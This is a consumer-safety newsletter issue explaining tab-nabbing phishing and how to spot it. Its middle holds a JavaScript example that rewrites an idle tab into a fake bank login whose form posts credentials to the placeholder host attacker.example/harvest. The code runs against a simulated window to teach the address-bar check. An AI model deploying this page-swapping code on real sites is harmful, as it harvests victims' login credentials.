Special Issue: Tab-Nabbing — The Latest Internet Phishing Scam

Spot this cunning new Internet phishing trick that hijacks and switches browser page tabs: Internet Scambusters #395

Internet phishing for account numbers, log-on details and other personal information is one of the biggest online scams.

But as Internet users wise up, becoming more wary about clicking on unsafe links, crooks have come up with a new trick: a page you already have open quietly turns itself into a bogus login screen for a site you trust, without you clicking anything at all.

“Tab-nabbing,” as it’s called, puts a powerful new weapon in the hands of identity thieves — but this week we show you how to spot and avoid it.

Time to get going…

Special Issue: Tab-Nabbing — The Latest Internet Phishing Scam

Just when you thought you’d seen it all, a new and particularly nasty form of Internet phishing, called tab-nabbing, poses a new identity theft threat to web users.

Phishing, just to remind you, happens when a scammer deceives you into giving away information about yourself, mostly account details such as username and password.

Usually via an email or a link on another web page, they direct you to a bogus site that looks exactly like the genuine article — like PayPal or Amazon for example — and captures your login details when you try to sign in.

The crook can then use those details to sign on and remove money or make purchases on your account.

You can read more about Internet phishing in some of our earlier issues.

Phishing Scams: How You Can Protect Yourself

New Clever PayPal Scam

3 New Phishing Scams: Clever Chase Bank Customer Survey Phishing Scam

All of these previous online phishing scams rely on the user being fooled into clicking a link, whereas the tab-nabber plays a different and much less obvious trick.

If you’re a regular Internet user, you’ll know how tabs work. In your browser — for example, Internet Explorer, Firefox, Safari or Google Chrome — they allow you to have several pages open at once, and to hop from one to the other.

Sometimes, when you click on a link in one page, it opens the new page in a separate tab, and it’s not unusual to have half a dozen or more tabs open at once.

You may even forget which ones you had open, which helps the tab-nabber immensely.

The way this particularly evil form of Internet phishing works goes like this:

  • You already have a couple of tabs open when you land on a page controlled by the tab-nabber (though you won’t know this).
  • The page waits until you switch to another tab. A web page can’t simply read your browsing history, but the original demonstration used a browser quirk (since fixed) to guess which popular sites you had visited, so it could pick a target you actually use, such as Amazon, PayPal or an email account like Gmail.
  • Once your attention is elsewhere, the page rewrites itself: its title, the little icon on the tab and its contents all change to mimic the chosen site’s login screen. It cannot alter your other tabs, only its own, but it is counting on you not remembering which tab was which and assuming you opened that site earlier and forgot.
  • Even better, from the tab-nabber’s point of view, you may really have the genuine site (your bank, for example) open in another tab. Returning to the wrong one, you find what looks like that site telling you you’ve been logged out.
  • Either way, the aim is to get you to type your username and password into the fake form, which sends them straight to the scammer, and, hey presto, the cunning Internet phishing trick is done.
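As an added example (not the Mozilla researcher’s demonstration and not code from this newsletter), here is how the page-rewriting step works in the browser. The domain names, the delay and the fake form are made up, and the browser itself is replaced by a small constructed stand-in object so the scenario runs outside a browser; on a real page, `window` would be passed to `installTabnabber` instead of `makeFakeWindow()`.

```javascript
// Constructed attacker configuration: what the page turns itself into once the
// victim has looked away. Domain names and the form action are placeholders.
const NABBER_CONFIG = {
  delayMs: 5000, // wait so the victim never sees the page change
  title: "Example Bank - Sign In", // new text on the tab
  favicon: "https://attacker.example/bank.ico", // copied logo for the tab
  loginHtml:
    '<form action="https://attacker.example/harvest" method="post">' +
    '<input name="user"><input name="pass" type="password"></form>',
};

// Replace (or add) the <link rel="icon"> so the tab shows the target's logo.
function setFavicon(doc, href) {
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement("link");
    link.rel = "icon";
    doc.head.appendChild(link);
  }
  link.href = href;
}

// Attach the attack to a window. The page can only rewrite itself: title,
// favicon and body change, other tabs are untouched and the URL stays put.
function installTabnabber(win, cfg) {
  const doc = win.document;
  let timer = null;
  let swapped = false;

  function swap() {
    timer = null;
    swapped = true;
    doc.title = cfg.title;
    setFavicon(doc, cfg.favicon);
    doc.body.innerHTML = cfg.loginHtml;
  }
  // Victim switched to another tab: start the countdown to the swap.
  win.addEventListener("blur", () => {
    if (!swapped && timer === null) timer = win.setTimeout(swap, cfg.delayMs);
  });
  // Victim came back too soon: cancel and keep looking innocent.
  win.addEventListener("focus", () => {
    if (timer !== null) {
      win.clearTimeout(timer);
      timer = null;
    }
  });
  return { isSwapped: () => swapped };
}

// The check the article recommends: whatever the tab and page claim, the
// address bar still names the host the page was loaded from.
function isOnExpectedHost(win, expectedHost) {
  return new URL(win.location.href).hostname === expectedHost;
}

// Constructed stand-in for a browser window: just enough DOM, events and
// timers (with a manual clock) to run the scenario without a browser.
function makeFakeWindow(href) {
  const listeners = {};
  const pending = [];
  let now = 0, nextId = 1, icon = null;
  const cancel = (id) => {
    const i = pending.findIndex((t) => t.id === id);
    if (i >= 0) pending.splice(i, 1);
  };
  return {
    document: {
      title: "Funny cat pictures",
      body: { innerHTML: "<img src='cat.jpg'>" },
      head: { appendChild(el) { icon = el; } },
      querySelector(sel) { return sel.includes("icon") ? icon : null; },
      createElement(tag) { return { tagName: tag.toUpperCase() }; },
    },
    location: { href },
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    dispatch(type) { (listeners[type] || []).forEach((fn) => fn()); },
    setTimeout(fn, ms) { const id = nextId++; pending.push({ id, fn, at: now + ms }); return id; },
    clearTimeout: cancel,
    tick(ms) { // advance the clock and fire timers that have come due
      now += ms;
      pending.filter((t) => t.at <= now).sort((a, b) => a.at - b.at)
        .forEach((t) => { cancel(t.id); t.fn(); });
    },
  };
}

// Walk through the attack: an early return leaves the page alone; a longer
// absence triggers the swap, yet the hostname still betrays the page.
function runScenario() {
  const win = makeFakeWindow("https://attacker.example/cats");
  const nab = installTabnabber(win, NABBER_CONFIG);
  win.dispatch("blur"); // victim goes to another tab
  win.tick(1000);
  win.dispatch("focus"); // back after a second: nothing has changed
  const swappedEarly = nab.isSwapped();
  win.dispatch("blur"); // away again, this time for long enough
  win.tick(NABBER_CONFIG.delayMs);
  return {
    swappedEarly,
    swapped: nab.isSwapped(),
    title: win.document.title,
    favicon: win.document.querySelector('link[rel~="icon"]').href,
    hostname: new URL(win.location.href).hostname,
    onBank: isOnExpectedHost(win, "bank.example"),
  };
}

console.log(runScenario());
```

Note what does and does not change: the tab text, the icon and the page contents are all under the page’s control, but `location.href` is not, which is why the address bar is the reliable tell and a convincing tab is not.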

Two key aspects make this much more effective than previous online phishing scams:

First, you don’t have to click a link to get to the bogus page; you just click on what looks like a genuine page tab.

Second, it uses sites you habitually visit whereas phishing emails often seem to come from organizations you’ve had no dealings with, so you would immediately suspect something was wrong.

In addition, if you do your banking online, the bank will often sign you out automatically when there’s no activity on its page, even if you still have it open in a tab. Being asked to sign on again is therefore nothing unusual, and that is exactly what the fake page imitates.

However, two other things give the tab-nabbing trick away. First, although the page may look genuine, the Internet address or URL shown in the address bar at the top of your browser won’t match: the page can rewrite what it displays, but not the address it was loaded from.

So the real Amazon sign-in page will show “amazon.com” as the site name, but the bogus page will show something quite different, even if it has the word “amazon” somewhere in it.

Second, check the padlock icon your browser shows for a secure (HTTPS) connection. Where it appears depends on the browser (older ones put it at the bottom right, current ones in the address bar), and a padlock on its own is not proof of anything: crooks can obtain a certificate for their own domain, so the padlock has to go together with the right address, not stand in for it.

Still, it’s a wicked deception, highlighted recently by Aza Raskin, a specialist who works for Mozilla, the organization that makes the Firefox browser. He published a write-up and a live demonstration of tab-nabbing (sometimes also written “tabnabbing” or called “tabnapping”).

What can you do to ensure you don’t fall victim to this new type of Internet phishing? To be doubly-secure, here’s what you should do.

  1. Get into the habit of glancing at the address bar for every page you visit or revisit, and read the site name, not just the padlock. This makes good secure-surfing sense anyway.
  2. Look for that padlock on what should be a secure site page, and make sure it belongs to the right address.
  3. After visiting a secure page, sign out and close it when you’re done, rather than keeping it open in a tab.
  4. If a site invites you to sign on again, don’t type anything into that page. Close the tab and re-key the correct address yourself.

Any one of these four steps should help steer you clear of a tab-nabbing scam — and if you have security software integrated with your browser, that should flag bogus sites too. With Internet phishing, you just can’t be too cautious.

That’s a wrap for this issue. Wishing you a great week!